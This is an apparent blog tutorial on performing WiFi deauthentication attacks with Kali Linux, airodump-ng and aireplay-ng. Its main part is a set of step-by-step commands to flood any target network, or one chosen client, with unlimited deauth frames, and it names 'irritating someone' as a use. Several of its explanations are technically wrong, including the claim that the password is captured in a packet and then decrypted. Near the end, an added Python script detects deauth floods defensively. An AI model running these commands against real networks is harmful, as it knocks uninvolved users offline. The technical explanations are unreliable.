In this article, I will explain a very useful attack that falls under the pre-connection wireless attacks category: the WiFi deauthentication attack, also known as the WiFi deauth attack.
What is WiFi Deauthentication Attack?
A WiFi deauthentication attack allows us to disconnect any device from any network without connecting to that network and without knowing its password. It is a kind of denial-of-service attack, used to disconnect the devices connected to a WiFi network by continuously sending data packets or disassociate beacons to that Access Point. The attack targets the communication between the clients (users) and the Access Point they are connected to.
Working of WiFi Deauthentication Attack
In this attack, the attacker pretends to be the client that is to be disconnected from the network by changing their MAC address to the client's MAC address. The attacker then sends special deauthentication packets to the client as a spoofed Access Point, saying in effect "you are not an authenticated user, validate yourself". This revokes the connection between the router and the client. After that, the Access Point and the user realize that they need to authenticate again. Because the client has the key/password saved in the to-be-validated packet, attackers can capture it and later decrypt it to compromise the network.
Denial-of-Service Attack or DoS Attack
A denial-of-service attack is a kind of cyber attack in which the attacker aims to make a system or resource unavailable to its users by allocating all of its resources to himself. The attack is performed by flooding the resource with more requests than it can handle. Its resources become overloaded, which makes the system or its services unavailable for some time.
But why use deauthentication?
It could be used in the following cases:
1. Cracking Wi-Fi password
2. In case of Fake Access Point Attack
3. In information gathering to perform other greater attacks
4. To disconnect fake users
5. Just for fun or to irritate someone.
How to deauthenticate devices in a Wi-Fi network?
To perform a deauthentication attack, the following are prerequisites:
- A system running Kali Linux
- A WiFi card that supports monitor mode
You can check this tutorial to install Kali Linux on VirtualBox: How to Install Kali Linux in Virtual box
How to perform a WiFi deauthentication attack
There are a number of tools available to perform this attack, like ip manager, aireplay-ng etc. For this tutorial I am going to use aireplay-ng, because it is very simple to use.
The following are the steps to perform a deauthentication attack on WiFi.
- First of all, open a terminal and put your network interface card into monitor mode by typing the following commands one by one.
sudo ifconfig (interface name) down. In this case it is sudo ifconfig wlan0 down
sudo iwconfig (interface name) mode monitor. In this case it is sudo iwconfig wlan0 mode monitor
sudo ifconfig (interface name) up. In this case it is sudo ifconfig wlan0 up
- Now start scanning for the available networks by typing sudo airodump-ng <network interface name>. In this case it is sudo airodump-ng wlan0. Wait until you find your target network, and then press CTRL+C to stop the scan.
- After that, we need to monitor our target network specifically.
To do so, type:
sudo airodump-ng -c (channel number) --bssid (BSSID of the network) (network interface name). In this case it will be: sudo airodump-ng -c 3 --bssid EC:B3:13:C6:75:49 wlan0
- If you want to deauthenticate all the devices in the WiFi network:
Type: sudo aireplay-ng -0 0 -a (BSSID of the targeted network) (Network interface name)
In this case it will be: sudo aireplay-ng -0 0 -a EC:B3:13:C6:75:49 wlan0
- If you want to deauthenticate a specific client in a network:
Type: sudo aireplay-ng -0 0 -a (MAC Address of the targeted network) -c (MAC Address of the device you want to deauthenticate) (Name of the interface)
Description of the command:
aireplay-ng is the name of the tool used to perform de-authentication.
-0 tells the tool to create de-authentication packets.
0 sends an infinite number of de-authentication packets. You can also use a small number of packets, like 10 or 20, whichever is suitable for your case.
-a XX:XX:XX:XX:XX:XX specifies the router or access point.
-c XX:XX:XX:XX:XX:XX specifies the MAC address of the client we want to disconnect from the network.
wlan(x) is your network interface card in monitor mode.
You can check the official repository for the aircrack-ng suite here: aircrack-ng.
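From the defender's side, the continuous stream of deauthentication frames described above stands out in a monitor-mode capture. The following added example (not part of the original article) parses raw 802.11 management frames and flags any BSSID/destination pair that receives an abnormal burst; the threshold, window, MAC addresses and sample frames are constructed assumptions.

```python
import struct
from collections import defaultdict, deque

# First frame-control byte: management type, subtype 12 (deauth) / 10 (disassoc)
DEAUTH, DISASSOC = 0xC0, 0xA0

def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame: bytes):
    """Return (kind, dst, src, bssid, reason) for a deauth/disassoc frame, else None.
    Expects the 802.11 header with any radiotap header already stripped."""
    if len(frame) < 26 or frame[0] not in (DEAUTH, DISASSOC):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    kind = "deauth" if frame[0] == DEAUTH else "disassoc"
    return kind, _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22]), reason

def detect_floods(frames, threshold=10, window=1.0):
    """frames: iterable of (timestamp_seconds, raw_frame).
    Returns the (bssid, dst) pairs that saw >= threshold deauth/disassoc
    frames inside any `window`-second span (threshold/window are assumed values)."""
    recent, alerts = defaultdict(deque), set()
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        _, dst, _, bssid, _ = parsed
        q = recent[(bssid, dst)]
        q.append(ts)
        while ts - q[0] > window:      # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts.add((bssid, dst))
    return alerts

def make_frame(fc0, dst, src, bssid, reason=7):
    """Build a constructed management frame for the sample data below."""
    raw = b"".join(bytes.fromhex(m.replace(":", "")) for m in (dst, src, bssid))
    return bytes([fc0, 0, 0, 0]) + raw + b"\x00\x00" + struct.pack("<H", reason)

# Constructed sample capture (locally administered MACs, not real devices):
AP, STA, BCAST = "02:00:00:00:00:01", "02:00:00:00:00:02", "ff:ff:ff:ff:ff:ff"
SAMPLE = [(0.0, make_frame(DEAUTH, AP, STA, AP, reason=3))]          # one ordinary disconnect
SAMPLE += [(5.0 + i * 0.01, make_frame(DEAUTH, BCAST, AP, AP)) for i in range(64)]  # burst
SAMPLE += [(6.0, bytes([0x80]) + bytes(40))]                         # a beacon, ignored

if __name__ == "__main__":
    for bssid, dst in sorted(detect_floods(SAMPLE)):
        print(f"possible deauth flood: bssid={bssid} target={dst}")
```
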
This is all about the WiFi deauthentication attack using Kali Linux. I hope you learned something new from this tutorial. If you have any questions or suggestions, please mention them in the comment box.